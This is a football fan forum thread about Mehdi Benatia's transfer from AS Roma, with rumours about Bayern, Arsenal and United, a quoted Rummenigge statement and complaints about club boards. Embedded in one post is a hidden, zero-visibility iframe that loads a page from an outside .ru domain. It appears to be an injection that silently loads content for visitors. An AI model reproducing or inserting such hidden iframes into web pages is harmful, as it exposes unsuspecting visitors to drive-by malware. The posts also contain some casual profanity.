Mehdi Benatia

R

Ryu Hayabusa

So according to Daily Star Arsenal and United are (still) in it for Benatia. Given how Rummenigge proves to be a frikkin moron yet again, given his latest statement concerning Benatia, I guess Benatia won't be coming after all. Stupid, fuckin' moron.

I

instinct

So according to Daily Star Arsenal and United are (still) in it for Benatia. Given how Rummenigge proves to be a frikkin moron yet again, given his latest statement concerning Benatia, I guess Benatia won't be coming after all. Stupid, fuckin' moron.

What did he say?

R

Ryu Hayabusa

Really? Dont you made like 40+ millon on transfers ?
yes. Which makes it even more ridonculous.

@instinct: Im Kicker stand's ;)

"Wenn man gewinnt, ist man immer ein wenig entspannter, wenn man verliert, gibt es Druck", sagte Vorstandsboss Karl-Heinz Rummenigge nach dem 2:1-Sieg gegen den VfL Wolfsburg am Freitag. "Wir haben eine gute Mannschaft, es kommen Spieler zurück. Das wird die Situation entspannen."

"If you win, one's always more relaxed. If you lose, there's pressure.
We have a good squad, players are coming back. This will ease the situation."

So maybe it would have been better if we'd lost to WoB...

Antimadridista1

Is he going to leave AS Roma this summer ? I don't really understand what his situation is at the moment… Leaving/Not leaving… New contract with more money/No contract… Bayern/Chelsea…?

F

Flavia

Is he going to leave AS Roma this summer ? I don't really understand what his situation is at the moment… Leaving/Not leaving… New contract with more money/No contract… Bayern/Chelsea…?
Who knows. It seems no one is matching or willing to pay what roma is asking

How many times have you watched Benatia?
Depends on who you're asking... but my guess is people have at most seen him playing once

yes. Which makes it even more ridonculous.

@instinct: Im Kicker stand's ;)

"If you win, one's always more relaxed. If you lose, there's pressure.
We have a good squad, players are coming back. This will ease the situation."

So maybe it would have been better if we'd lost to WoB...

I really don't think 30m is roma's asking price, Ryu. It seems too low for the hype.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Culeee

Agreement reached between roma and bayern. 26 € plus 4 € in bonusses. Salary 4 € a year. So for a extra 15 mill we could have had benatia instead of vermaelen.. wow

FCBarca

Mike the Knife
Agreement reached between roma and bayern. 26 € plus 4 € in bonusses. Salary 4 € a year. So for a extra 15 mill we could have had benatia instead of vermaelen.. wow

A massive fail by the board, IMHO...Left footed & injured Vermaelen compared to Benatia?...Cannot wait for this board to disappear

Home of Barca Fans